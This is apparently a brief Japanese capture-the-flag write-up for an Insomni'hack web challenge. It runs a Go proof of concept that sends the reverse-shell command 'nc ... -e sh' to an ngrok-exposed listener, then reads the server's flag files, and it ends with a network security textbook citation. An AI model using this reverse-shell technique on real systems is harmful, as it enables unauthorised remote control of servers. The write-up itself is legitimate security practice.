このPoCを利用する。
ローカルでリクエストを待ち受ける。
$ nc -l 1234
ngrokで公開する。
$ ngrok tcp 1234
PoCを実行する。
$ go run poc.go 
Target (e.g. https://localhost:9000):
https://welcome.insomnihack.ch:8443 
Command (e.g. nc 192.168.0.10 2345 -e sh):
nc 0.tcp.jp.ngrok.io 12649 -e sh
[*] INFO: Preparing to send command: "nc 0.tcp.jp.ngrok.io 12649 -e sh" to "https://welcome.insomnihack.ch:8443"
[*] INFO: Sending request...
Webサーバと接続されているのでコマンドを実行する。
$ nc -l 1234
ls
createUserAccount.php
info_flag
cat info_flag
The flag is located at /flag.txt
cat /flag.txt
INS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}
ネットワークセキュリティ概論
井関 文一
コロナ社
2022-03-07